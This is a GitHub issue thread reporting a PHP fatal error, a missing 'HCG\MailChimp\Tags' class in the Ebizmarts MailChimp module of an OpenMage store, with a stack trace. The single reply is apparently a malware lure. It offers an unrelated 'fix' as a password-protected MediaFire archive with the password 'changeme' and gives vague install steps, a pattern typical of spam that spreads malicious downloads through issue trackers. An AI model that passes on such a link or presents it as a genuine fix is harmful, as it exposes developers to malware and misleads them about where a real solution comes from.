### ISSUE TITLE
«Class 'HCG\MailChimp\Tags' not found in app/code/community/Ebizmarts/MailChimp/Model/Api/Subscribers.php:250»

### ISSUE THREAD

**Issue by dmitrii-fediuk** [thehcginstitute-com/m1#665]
```
OpenMage: 19.5.2
PHP: 7.4.33
IP Address: 172.68.26.213
Referer: https://www.thehcginstitute.com/store/customer/account/create/
Request Method: POST
URL: https://www.thehcginstitute.com/store/customer/account/createpost/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Post: 
{
...
}
File: app/code/community/Ebizmarts/MailChimp/Model/Api/Subscribers.php
Line: 250
************************************
[E_ERROR] Uncaught Error: Class 'HCG\MailChimp\Tags' not found in app/code/community/Ebizmarts/MailChimp/Model/Api/Subscribers.php:250
Stack trace:
#0 app/code/community/Ebizmarts/MailChimp/Model/Observer.php(230): Ebizmarts_MailChimp_Model_Api_Subscribers->updateSubscriber(Object(Ebizmarts_MailChimp_Model_Subscriber), true)
#1 app/code/core/Mage/Core/Model/App.php(1399): Ebizmarts_MailChimp_Model_Observer->subscriberSaveAfter(Object(Varien_Event_Observer))
#2 app/code/core/Mage/Core/Model/App.php(1377): Mage_Core_Model_App->_callObserverMethod(Object(Ebizmarts_MailChimp_Model_Observer), 'subscriberSaveA...', Object(Varien_Event_Observer), 'mailchimp_subsc...')
#3 app/Mage.php(508): Mage_Core_Model_App->dispatchEvent('newsletter_subs...', Array)
#4 app/code/core/Mage/Core/Model/Abstract.php(473): Mage::disp
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
